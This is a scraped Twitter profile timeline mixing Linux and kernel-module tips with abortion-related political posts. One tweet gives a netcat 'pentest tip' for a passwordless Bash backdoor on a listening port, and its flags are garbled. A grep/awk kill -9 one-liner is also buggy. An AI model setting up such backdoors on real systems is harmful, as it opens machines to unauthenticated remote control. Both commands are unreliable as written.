Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @k3rn3lhack3r
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @k3rn3lhack3r
-
Prikvačeni tweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
k3rn3lhack3r proslijedio/la je Tweet
Androids are better than iPhones. Cry about it.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I love this, grep is quite possibly the best tool on Linux. Use it with awk (and sometimes sed) and you can produce some powerful scripts on the fly ; e.g., ps -ef | grep <user> | awk '{print $1}' > pid.txt ; for pid in `cat file.txt` do kill -9
$pid ; doneHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
So, I was asked if i'd be OK with being raped (forced to impregnate people against my will). I'd have thought the obvious answer to being asked if one is OK with being raped is usually No. Therefore, why ask if i'm OK with being raped?https://twitter.com/Danime414/status/1222631810531647488 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Unethical people have always done unethical things, and always will do unethical things. The solution: make unethical things legal.https://twitter.com/NewPhon29739701/status/1222457270727921664 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[Warning: logic ahead] The number of pregnancies that I have had do not determine the validity of my argument. It's valid when the antecedent & consequent are both true: P -> Q P Therefore, Q You are arguing: P -> Q only IF person X had Y number of pregnancies. INCONCEIVABLEpic.twitter.com/OLLIwV5euz
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I'll just leave this here, and let her words speak for themselves.https://twitter.com/LisaBrenner2/status/1222241818282094592 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Apparently having a career is one of the criteria for determining the right to life. I guess that means it's open season on the unemployed, disabled, elderly and schoolchildren.https://twitter.com/LisaBrenner2/status/1222148880269078529 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I've coded a simple wrapper in
#Perl for some common pentest tools (nothing fancy, just 25 mins work whilst watching Call the Midwife). Please feel free to clone the repo & hack. I'll add more options if requested.https://github.com/k3rn3lhack3r/secscript/blob/master/sec …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Pong AI on my Pebble Watch (N.B. it runs on Linux).pic.twitter.com/w8M8gnRlhd
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Take a bog standard android tablet, install Ubuntu using Userland, pair with bluetooth keyboard & mouse and you got yourself a full blown Linux server/workstation.pic.twitter.com/QGhxhYqgc5
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Run Linux in a web browser http://copy.sh/v86/
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
How many times must I repeat this to the
#prochoice mafia until they finally get it? 01100010 01100001 01100010 01111001 01110011 01100010 01101111 01100100 01111001 01100010 01100001 01100010 01111001 01110011 01100011 01101000 01101111 01101001 01100011 01100101Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
LINUX PENTEST TIP USING NETCAT. You can create a Bash backdoor with: sudo nc -v -l -p 9999 -p /bin/bash You can now connect to port 9999 with nc, and be given a full Bash shell without a password: nc [ip address] 9999pic.twitter.com/n7jXmDdQQD
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
SQL INDEX TIPS alter table [tablename] add index [indexname](index1, index2) <- Add index [indexname] to table [tablename] show index from [tablename] <- list indexes on [tablename] drop index [indexname] on [tablename] <- deletes index.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Commands for loading,viewing and unloading the basicmod Kernel module: sudo insmod basicmod.ko <- Load the mod into the Kernel. lsmod | grep basicmod <- Show the mod is loaded. sudo rmmod basicmod <- Remove the mod from the kernel.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Bare minimum Makefile for Kernel module: obj-m += basicmod.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
And finally, call both methods: module_init(basicmod_init); module_exit(basicmod_exit);
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Exit method: static void __exit basicmod_exit(void) { printk(KERN_INFO "Goodbye, Linux Kernel\n"); }
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Init method: static int __init basicmod_init(void) { printk(KERN_INFO "Hello, Linux Kernel\n"); return 0; }
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.